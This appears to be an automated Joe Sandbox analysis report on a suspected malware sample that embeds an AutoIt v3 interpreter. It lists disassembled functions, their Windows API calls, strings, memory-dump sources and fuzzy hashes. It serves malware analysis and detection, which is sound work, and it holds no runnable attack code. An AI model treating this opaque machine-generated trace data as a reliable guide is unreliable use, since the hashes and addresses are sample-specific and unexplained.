                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008A2CAC,00000000), ref: 00887E2B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00887E3B
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00887E61
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00887E80
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00887EA2
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0088808F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: b5372d54efdd0ebea5f63942108760e118215eb8728554ec0d0869646aa0d0af
                                                            • Instruction ID: 237a66c63a0257d8852b9c637e7c23624ce10c356836a1c4a2567d9ad491a3e4
                                                            • Opcode Fuzzy Hash: b5372d54efdd0ebea5f63942108760e118215eb8728554ec0d0869646aa0d0af
                                                            • Instruction Fuzzy Hash: 54022A71900119EFDB14AFA9CC89EAE7BB9FF48310F148159FA15EB2A1DB709D41CB60
                                                            Function 008937F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0089F910), ref: 008938AF
                                                            • IsWindowVisible.USER32(?), ref: 008938D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: 56c28c1978103ea086644f558338c95ef5fb4dc83d62a12db71757cf023d2ffb
                                                            • Instruction ID: bc5332ab76af9d85c9f0dc3d0c60c5af6c7056d4194547e516a823b5cb3ea684
                                                            • Opcode Fuzzy Hash: 56c28c1978103ea086644f558338c95ef5fb4dc83d62a12db71757cf023d2ffb
                                                            • Instruction Fuzzy Hash: CDD13E302047159BCB14FF54C461A6A7BE9FF94358F184558F886DB2A2CB35EE4ACB82
                                                            Function 0089A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0089A89F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0089A8D0
                                                            • GetSysColor.USER32(0000000F), ref: 0089A8DC
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0089A8F6
                                                            • SelectObject.GDI32(?,?), ref: 0089A905
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0089A930
                                                            • GetSysColor.USER32(00000010), ref: 0089A938
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0089A93F
                                                            • FrameRect.USER32(?,?,00000000), ref: 0089A94E
                                                            • DeleteObject.GDI32(00000000), ref: 0089A955
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0089A9A0
                                                            • FillRect.USER32(?,?,?), ref: 0089A9D2
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089A9FD
                                                              • Part of subcall function 0089AB60: GetSysColor.USER32(00000012), ref: 0089AB99
                                                              • Part of subcall function 0089AB60: SetTextColor.GDI32(?,?), ref: 0089AB9D
                                                              • Part of subcall function 0089AB60: GetSysColorBrush.USER32(0000000F), ref: 0089ABB3
                                                              • Part of subcall function 0089AB60: GetSysColor.USER32(0000000F), ref: 0089ABBE
                                                              • Part of subcall function 0089AB60: GetSysColor.USER32(00000011), ref: 0089ABDB
                                                              • Part of subcall function 0089AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0089ABE9
                                                              • Part of subcall function 0089AB60: SelectObject.GDI32(?,00000000), ref: 0089ABFA
                                                              • Part of subcall function 0089AB60: SetBkColor.GDI32(?,00000000), ref: 0089AC03
                                                              • Part of subcall function 0089AB60: SelectObject.GDI32(?,?), ref: 0089AC10
                                                              • Part of subcall function 0089AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0089AC2F
                                                              • Part of subcall function 0089AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0089AC46
                                                              • Part of subcall function 0089AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0089AC5B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 98d1becf788d1eb313b666e6c31ce4ec07e713bb0093c0c38192fd9f890cf6dd
                                                            • Instruction ID: 2bd956c9829f949d66c6d7b3ba50cfa90f274d12c8c82d76cdc915a6f941c431
                                                            • Opcode Fuzzy Hash: 98d1becf788d1eb313b666e6c31ce4ec07e713bb0093c0c38192fd9f890cf6dd
                                                            • Instruction Fuzzy Hash: AEA18471004305EFDB15AF64DC08A6B7BA9FF88321F184A2AF662D61E1D771D944CB92
                                                            Function 008877BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 008877F1
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008878B0
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008878EE
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00887900
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00887946
                                                            • GetClientRect.USER32(00000000,?), ref: 00887952
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00887996
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008879A5
                                                            • GetStockObject.GDI32(00000011), ref: 008879B5
                                                            • SelectObject.GDI32(00000000,00000000), ref: 008879B9
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008879C9
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008879D2
                                                            • DeleteDC.GDI32(00000000), ref: 008879DB
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00887A07
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00887A1E
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00887A59
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00887A6D
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00887A7E
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00887AAE
                                                            • GetStockObject.GDI32(00000011), ref: 00887AB9
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00887AC4
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00887ACE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 5e04591712e54224aa4adb42e8603345c93f1bfbcb344be6f05be5d2150a778c
                                                            • Instruction ID: 0afa94c16d55116b7c737d4f6f60fc404ec9764a4303c3536a88fc149cb2c36c
                                                            • Opcode Fuzzy Hash: 5e04591712e54224aa4adb42e8603345c93f1bfbcb344be6f05be5d2150a778c
                                                            • Instruction Fuzzy Hash: 11A16DB1A40209BFEB149BA8DC4AFAA7BB9FF44710F144215FA15E72E1D770AD10CB64
                                                            Function 0087AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087AF89
                                                            • GetDriveTypeW.KERNEL32(?,0089FAC0,?,\\.\,0089F910), ref: 0087B066
                                                            • SetErrorMode.KERNEL32(00000000,0089FAC0,?,\\.\,0089F910), ref: 0087B1C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 384ca873484ccf7d8d53df5dc81dbdba68308de52e2584b577c27f2d39133b9e
                                                            • Instruction ID: b10075154916d623a27ab5f017abe78ccfa006a8d6bc77d3f86d4426ce86ee12
                                                            • Opcode Fuzzy Hash: 384ca873484ccf7d8d53df5dc81dbdba68308de52e2584b577c27f2d39133b9e
                                                            • Instruction Fuzzy Hash: 2251BE7068424CAACB08EB14C9A6FBD73B2FF24349760C019E45EE7694CB38DD419B63
                                                            Function 00816A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 299407e9a03369f065baabd081035fdbfb49121f4b594119173afcf30e49f74a
                                                            • Instruction ID: 5f44b2d35a4317b24d0bd190d5a7a1c38d1dd106b93a5aa143ac7ccb2570a8d6
                                                            • Opcode Fuzzy Hash: 299407e9a03369f065baabd081035fdbfb49121f4b594119173afcf30e49f74a
                                                            • Instruction Fuzzy Hash: B3811870644619BACF24AF68DC82FFA77ACFF15714F044025FD85EA182FB64DA91C292
                                                            Function 0089AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0089AB99
                                                            • SetTextColor.GDI32(?,?), ref: 0089AB9D
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0089ABB3
                                                            • GetSysColor.USER32(0000000F), ref: 0089ABBE
                                                            • CreateSolidBrush.GDI32(?), ref: 0089ABC3
                                                            • GetSysColor.USER32(00000011), ref: 0089ABDB
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0089ABE9
                                                            • SelectObject.GDI32(?,00000000), ref: 0089ABFA
                                                            • SetBkColor.GDI32(?,00000000), ref: 0089AC03
                                                            • SelectObject.GDI32(?,?), ref: 0089AC10
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0089AC2F
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0089AC46
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0089AC5B
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0089ACA7
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0089ACCE
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0089ACEC
                                                            • DrawFocusRect.USER32(?,?), ref: 0089ACF7
                                                            • GetSysColor.USER32(00000011), ref: 0089AD05
                                                            • SetTextColor.GDI32(?,00000000), ref: 0089AD0D
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0089AD21
                                                            • SelectObject.GDI32(?,0089A869), ref: 0089AD38
                                                            • DeleteObject.GDI32(?), ref: 0089AD43
                                                            • SelectObject.GDI32(?,?), ref: 0089AD49
                                                            • DeleteObject.GDI32(?), ref: 0089AD4E
                                                            • SetTextColor.GDI32(?,?), ref: 0089AD54
                                                            • SetBkColor.GDI32(?,?), ref: 0089AD5E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: f47e25b25301aaad7d2edc0bd21c2a6171aad6c8a10c5e585c26beba6237b8b4
                                                            • Instruction ID: 9ce4da13072c64511a6419068d37a355f7f2eda88a774307b3b63b5eaca7d74f
                                                            • Opcode Fuzzy Hash: f47e25b25301aaad7d2edc0bd21c2a6171aad6c8a10c5e585c26beba6237b8b4
                                                            • Instruction Fuzzy Hash: 2D613F71900218EFDF15AFA8DC48EAE7B79FB08320F194126FA15EB2A1D7759D40DB90
                                                            Function 00898C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00898D34
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00898D45
                                                            • CharNextW.USER32(0000014E), ref: 00898D74
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00898DB5
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00898DCB
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00898DDC
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00898DF9
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00898E45
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00898E5B
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00898E8C
                                                            • _memset.LIBCMT ref: 00898EB1
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00898EFA
                                                            • _memset.LIBCMT ref: 00898F59
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00898F83
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00898FDB
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00899088
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 008990AA
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008990F4
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00899121
                                                            • DrawMenuBar.USER32(?), ref: 00899130
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00899158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: fdf0f492f744f33ba0e9a6fb04015eadfc7815507692f3694739333fc760c37c
                                                            • Instruction ID: 0459071810d5d0cac82c3b993a96c6ce2b25bc79596c56c7119fbbf7ee0c21e5
                                                            • Opcode Fuzzy Hash: fdf0f492f744f33ba0e9a6fb04015eadfc7815507692f3694739333fc760c37c
                                                            • Instruction Fuzzy Hash: 6CE19F7090120AEFDF20AF64CC84AEE7B78FF05714F08815AF915EA291DB748A81DF61
                                                            Function 00894B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00894C51
                                                            • GetDesktopWindow.USER32 ref: 00894C66
                                                            • GetWindowRect.USER32(00000000), ref: 00894C6D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00894CCF
                                                            • DestroyWindow.USER32(?), ref: 00894CFB
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00894D24
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00894D42
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00894D68
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00894D7D
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00894D90
                                                            • IsWindowVisible.USER32(?), ref: 00894DB0
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00894DCB
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00894DDF
                                                            • GetWindowRect.USER32(?,?), ref: 00894DF7
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00894E1D
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00894E37
                                                            • CopyRect.USER32(?,?), ref: 00894E4E
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00894EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 608861c19c89f6dba9f71dafbf32204a8967fe5b17a2ed12c86d4b47df249941
                                                            • Instruction ID: 9c6af644bfd1adbb4564c9c5ac0ff77c14c63809bea1303ee820b9452d436f9e
                                                            • Opcode Fuzzy Hash: 608861c19c89f6dba9f71dafbf32204a8967fe5b17a2ed12c86d4b47df249941
                                                            • Instruction Fuzzy Hash: 09B14771608341AFDB04EF68C845F6ABBE4FF88314F048919F599DB2A2D771E845CB92
                                                            Function 008746D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008746E8
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0087470E
                                                            • _wcscpy.LIBCMT ref: 0087473C
                                                            • _wcscmp.LIBCMT ref: 00874747
                                                            • _wcscat.LIBCMT ref: 0087475D
                                                            • _wcsstr.LIBCMT ref: 00874768
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00874784
                                                            • _wcscat.LIBCMT ref: 008747CD
                                                            • _wcscat.LIBCMT ref: 008747D4
                                                            • _wcsncpy.LIBCMT ref: 008747FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 0b822b13daa02fce1520965588cc9fea8252bf300bd8b8eb94a5a9531e59d7b4
                                                            • Instruction ID: 5a306876e63b2db60f7e93d3d40706a09aa2f44a96f756273f79343ea8309666
                                                            • Opcode Fuzzy Hash: 0b822b13daa02fce1520965588cc9fea8252bf300bd8b8eb94a5a9531e59d7b4
                                                            • Instruction Fuzzy Hash: 7741F5716002287AEB18B7689C47EBF77BCFF81710F04406AF909E6182EF75D90196E6
                                                            Function 008127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008128BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 008128C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008128EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 008128F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0081291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00812939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00812949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0081297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00812990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 008129AE
                                                            • GetStockObject.GDI32(00000011), ref: 008129CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 008129D5
                                                              • Part of subcall function 00812344: GetCursorPos.USER32(?), ref: 00812357
                                                              • Part of subcall function 00812344: ScreenToClient.USER32(008D67B0,?), ref: 00812374
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000001), ref: 00812399
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000002), ref: 008123A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00811256), ref: 008129FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
